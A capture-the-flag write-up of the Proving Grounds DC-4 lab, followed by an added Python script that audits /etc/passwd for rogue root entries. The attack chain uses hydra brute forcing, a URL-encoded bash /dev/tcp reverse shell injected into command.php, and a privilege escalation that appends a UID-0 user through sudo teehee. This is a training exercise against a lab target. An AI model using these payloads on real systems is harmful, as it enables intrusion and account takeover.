Proving Grounds - DC-4

Introduction

This is a Proving Grounds room which can be found at: DC-4

A double-edged sword

Reconnaissance & Scanning

Perform an nmap scan of all TCP ports to identify open ports and services.

  • Command: nmap -p- -T4 -v 192.168.142.195
geobour98@kali:~$ nmap -p- -T4 -v 192.168.142.195
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-28 19:48 EEST
Initiating Ping Scan at 19:48
Scanning 192.168.142.195 [2 ports]
Completed Ping Scan at 19:48, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:48
Completed Parallel DNS resolution of 1 host. at 19:48, 0.00s elapsed
Initiating Connect Scan at 19:48
Scanning 192.168.142.195 (192.168.142.195) [65535 ports]
Discovered open port 22/tcp on 192.168.142.195
Discovered open port 80/tcp on 192.168.142.195
Completed Connect Scan at 19:49, 18.93s elapsed (65535 total ports)
Nmap scan report for 192.168.142.195 (192.168.142.195)
Host is up (0.053s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.03 seconds

Perform an aggressive nmap scan (-A) to enable OS detection, default scripts and version detection on the discovered ports.

  • Command: sudo nmap -A -sC -p 22,80 -v 192.168.142.195
geobour98@kali:~$ sudo nmap -A -sC -p 22,80 -v 192.168.142.195
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-28 19:50 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating Ping Scan at 19:50
Scanning 192.168.142.195 [4 ports]
Completed Ping Scan at 19:50, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:50
Completed Parallel DNS resolution of 1 host. at 19:50, 0.00s elapsed
Initiating SYN Stealth Scan at 19:50
Scanning 192.168.142.195 (192.168.142.195) [2 ports]
Discovered open port 22/tcp on 192.168.142.195
Discovered open port 80/tcp on 192.168.142.195
Completed SYN Stealth Scan at 19:50, 0.09s elapsed (2 total ports)
Initiating Service scan at 19:50
Scanning 2 services on 192.168.142.195 (192.168.142.195)
Completed Service scan at 19:50, 6.15s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.142.195 (192.168.142.195)
Retrying OS detection (try #2) against 192.168.142.195 (192.168.142.195)
Initiating Traceroute at 19:50
Completed Traceroute at 19:50, 0.07s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:50
Completed Parallel DNS resolution of 1 host. at 19:50, 0.00s elapsed
NSE: Script scanning 192.168.142.195.
Initiating NSE at 19:50
Completed NSE at 19:50, 1.75s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.22s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Nmap scan report for 192.168.142.195 (192.168.142.195)
Host is up (0.057s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: System Tools
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.13 (91%), Linux 3.10 - 3.16 (91%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 198.841 days (since Sun Mar 13 22:39:35 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   69.20 ms 192.168.49.1 (192.168.49.1)
2   69.37 ms 192.168.142.195 (192.168.142.195)

NSE: Script Post-scanning.
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.79 seconds
           Raw packets sent: 78 (5.316KB) | Rcvd: 36 (2.896KB)

Brute force the website for directories and files with the .php extension using gobuster.

  • Command: gobuster dir -u http://192.168.142.195/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
geobour98@kali:~$ gobuster dir -u http://192.168.142.195/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.142.195/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/09/28 19:53:20 Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 302) [Size: 206] [--> index.php]
/images               (Status: 301) [Size: 170] [--> http://192.168.142.195/images/]
/index.php            (Status: 200) [Size: 506]                                     
/css                  (Status: 301) [Size: 170] [--> http://192.168.142.195/css/]   
/logout.php           (Status: 302) [Size: 163] [--> index.php]                     
/command.php          (Status: 302) [Size: 704] [--> index.php]

===============================================================
2022/09/28 20:01:23 Finished
===============================================================

Exploitation

The most interesting file is command.php, but it redirects (302) to index.php, so we probably have to be authenticated in order to view it.

Now we brute force the password of the admin user with hydra. The S=command condition tells hydra to treat a response that contains the word command as a successful login, so a hit means we have found the password.

  • Command: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.142.195 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"
geobour98@kali:~$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.142.195 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-28 19:54:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.142.195:80/login.php:username=^USER^&password=^PASS^:S=command
[80][http-post-form] host: 192.168.142.195   login: admin   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-28 19:55:10

Now we can log in with the username admin and the found password, and navigate to /command.php.

Here we can execute some commands from the UI. If we intercept a request with Burp Suite, we see that it is a POST request with a parameter named radio, whose value is executed as a Linux command. So we can place a bash reverse shell there, such as bash -c 'exec bash -i &>/dev/tcp/192.168.49.117/443 <&1', but we have to URL-encode it first. The request in Burp Suite should look like this:

POST /command.php HTTP/1.1
Host: 192.168.142.195
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://192.168.142.195
Connection: close
Referer: http://192.168.142.195/command.php
Cookie: PHPSESSID=h8dn71jf3jkrrdgnd7u0a525f6
Upgrade-Insecure-Requests: 1

radio=bash+-c+'exec+bash+-i+%26>/dev/tcp/192.168.49.142/443+<%261'&submit=Run

With a netcat listener open, we get a reverse shell as www-data, which we then upgrade to a fully interactive TTY.

listening on [any] 443 ...
connect to [192.168.49.142] from (UNKNOWN) [192.168.142.195] 53996
bash: cannot set terminal process group (541): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-4:/usr/share/nginx/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ ^Z
zsh: suspended  nc -lvnp 443

geobour98@kali:~$ stty raw -echo;fg
[1]  + continued  nc -lvnp 443 
www-data@dc-4:/usr/share/nginx/html$ export TERM=xterm-256color
www-data@dc-4:/usr/share/nginx/html$ stty rows 38 cols 111
www-data@dc-4:/usr/share/nginx/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Navigating to /home/jim we find local.txt, as well as an interesting folder named backups, which contains the file old-passwords.bak.

www-data@dc-4:/home/jim$ cat local.txt 
[REDACTED]
www-data@dc-4:/home/jim$ cd backups
www-data@dc-4:/home/jim/backups$ ls 
old-passwords.bak

Then we transfer old-passwords.bak to the attacker machine and use it as a wordlist to brute force the SSH password of the user jim, again with hydra.

  • Command: hydra -l jim -P old-passwords.bak ssh://192.168.142.195
geobour98@kali:~$ hydra -l jim -P old-passwords.bak ssh://192.168.142.195
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-28 20:05:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.142.195:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 109 to do in 00:01h, 13 active
[STATUS] 105.50 tries/min, 211 tries in 00:02h, 44 to do in 00:01h, 13 active
[22][ssh] host: 192.168.142.195   login: jim   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-28 20:08:10

Now we can log in over SSH as the user jim with the found password.

geobour98@kali:~$ ssh jim@192.168.142.195                                     
The authenticity of host '192.168.142.195 (192.168.142.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.142.195' (ED25519) to the list of known hosts.
jim@192.168.142.195's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$

Then we run find to list the files owned by jim. The most interesting one is /var/mail/jim, which contains the password of the user charles, so we switch to that user.

jim@dc-4:~$ find / -type f -user jim 2>/dev/null
[REDACTED]
/var/mail/jim
[REDACTED]
jim@dc-4:~$ cat /var/mail/jim
[REDACTED]
Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  [REDACTED]

See ya,
Charles
[REDACTED]
jim@dc-4:~$ su charles
Password: 
charles@dc-4:/home/jim$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)

Privilege Escalation

Running sudo -l shows that we can execute /usr/bin/teehee as root without a password. Running strings on /usr/bin/teehee reveals the binary's help text, which is that of tee: it copies standard input to each FILE, and with -a it appends to the given files instead of overwriting them.

So we can run it with the -a option to append a new user entry with both UID and GID set to 0 (root) to /etc/passwd.

Before running /usr/bin/teehee we must generate a password hash (for the password geobour98 in my case) with openssl, so that we can put it in the password field of the new /etc/passwd entry.

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ strings /usr/bin/teehee
[REDACTED]
Try '%s --help' for more information.                                                              
Usage: %s [OPTION]... [FILE]...                                                                    
Copy standard input to each FILE, and also to standard output.                                     
  -a, --append              append to the given FILEs, do not overwrite                            
  -i, --ignore-interrupts   ignore interrupt signals                                               
  -p                        diagnose errors writing to non pipes                                   
      --output-error[=MODE]   set behavior on write error.  See MODE below                         
      --help     display this help and exit                                                        
      --version  output version information and exit                                               
MODE determines behavior with write errors on the outputs:                                         
  'warn'         diagnose errors writing to any output                                             
  'warn-nopipe'  diagnose errors writing to any output not a pipe                                  
  'exit'         exit on error writing to any output                                               
  'exit-nopipe'  exit on error writing to any output not a pipe
[REDACTED]
charles@dc-4:~$ openssl passwd geobour98
Warning: truncating password to 8 characters
GWIOrZOActC.A
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd                                                
geobour98:GWIOrZOActC.A:0:0:::/bin/bash                                                                         
geobour98:GWIOrZOActC.A:0:0:::/bin/bash                                                                         
^C                                                                                                 
charles@dc-4:~$ cat /etc/passwd
[REDACTED]
geobour98:GWIOrZOActC.A:0:0:::/bin/bash
[REDACTED]
charles@dc-4:~$ su geobour98
Password: 
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# cat /root/proof.txt
[REDACTED]
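As an added defender-side example (not part of the original write-up), the following Python function audits passwd-format text for exactly the kind of entry the step above appends: a second UID 0 account, a password hash stored in /etc/passwd instead of /etc/shadow, and an empty home directory. The sample content is constructed; only the appended geobour98 line is taken from the session above.

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Finding:
    line_no: int
    user: str
    reason: str

def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious property of each passwd entry."""
    findings: List[Finding] = []
    for n, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append(Finding(n, raw, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, _gecos, home, _shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            findings.append(Finding(n, name, "non-numeric UID or GID"))
            continue
        # Any second UID 0 account is a root-equivalent backdoor.
        if uid == "0" and name != "root":
            findings.append(Finding(n, name, "extra UID 0 account"))
        # A shadowed system keeps 'x' here; a real hash means the entry
        # was written around the shadow mechanism (as teehee -a does).
        if pw == "":
            findings.append(Finding(n, name, "empty password field"))
        elif pw not in ("x", "*", "!"):
            findings.append(Finding(n, name, "password hash stored in passwd"))
        if home == "":
            findings.append(Finding(n, name, "empty home directory"))
    return findings

# Constructed sample: ordinary Debian-style entries plus the line appended above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jim:x:1000:1000:jim,,,:/home/jim:/bin/bash
charles:x:1001:1001:charles,,,:/home/charles:/bin/bash
geobour98:GWIOrZOActC.A:0:0:::/bin/bash
"""

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```

Run against a real /etc/passwd by passing the file's contents to audit_passwd; a clean system yields no findings.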

Proof of Concept (PoC image)

This post is licensed under CC BY 4.0 by the author.